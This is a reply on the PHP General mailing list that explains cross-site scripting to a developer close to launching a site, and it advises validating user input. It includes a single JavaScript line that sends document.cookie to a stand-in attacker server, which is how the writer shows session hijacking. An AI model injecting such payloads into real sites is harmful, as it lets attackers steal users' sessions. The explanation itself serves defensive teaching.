> > Or steal it. :)
> >
> > I hope you have checked your site for any cross-site scripting
> > vulnerabilities. This is exactly where vulnerabilities like this
> > into play...
> Interesting -- I'm only a few days away from launching this... could
> elaborate on the potential risk, or point me to some documentation?

Just search google for Cross Site Scripting and you'll find a ton of
articles about that specifically. It all comes down to validating user
input and not displaying it directly back to the screen. 

Here is a link, for example, that'll pop up your cookies for cnn.com.
(watch the wrapping!)


Now, how about instead of just executing alert("Hi"), I do a
location.href='www.myserver.com?var='+document.cookie; and send myself
your cookie. Then I just simply make my cookie match yours, and poof,
I'm you. :)

It all comes down to validating user input and never showing it directly
back to the browser/screen. 

Similar problems exist for variables you use in database queries...

---John Holmes...

PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Reply via email to